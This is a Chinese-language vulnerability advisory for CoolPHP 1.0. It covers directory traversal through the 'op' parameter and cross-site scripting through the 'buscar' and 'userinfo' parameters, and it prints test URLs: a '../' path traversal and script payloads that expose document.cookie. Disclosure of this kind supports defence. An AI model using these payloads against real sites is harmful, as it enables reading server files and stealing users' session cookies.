CoolPHP远程任意文件查看及脚本执行漏洞

受影响系统:
CoolPHP CoolPHP 1.0
描述:
--------------------------------------------------------------------------------
CoolPHP是一款基于PHP的网站构建系统。

CoolPHP多处没有正确验证用户提交的输入,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令或进行脚本执行攻击。

'index.php'对用户提交给"op"参数的数据缺少充分锅炉,提交包含多个'../'的字符作为参数数据,可绕过WEB ROOT限制以系统权限查看文件内容。

另外对'buscar'模块的'query'参数和'userinfo'模块的'nick'参数缺少充分HTML代码检查,构建恶意链接,诱使用户访问,可能泄露用户敏感信息。

<*来源:R00tCr4ck ([email protected]

链接:http://www.securitytracker.com/alerts/2004/Oct/1011748.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

R00tCr4ck ([email protected])提供了如下测试方法:

查看文件内容信息:

http://[victim]/index.php?op=../../../../anotheruser/evilfile

跨站脚本攻击:

http://[victim]/index.php?op=buscar&query=

1<script language="javascript">window.alert(document.cookie);</script>

http://[victi m]/index.php?op=buscar&query=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E

http://[victim]/index.php?op=userinfo&nick=

1<script language="javascript">window.alert(document.cookie);</script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

CoolPHP
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://cphp.sourceforge.net/

Published At
Categories with 网络技术
comments powered by Disqus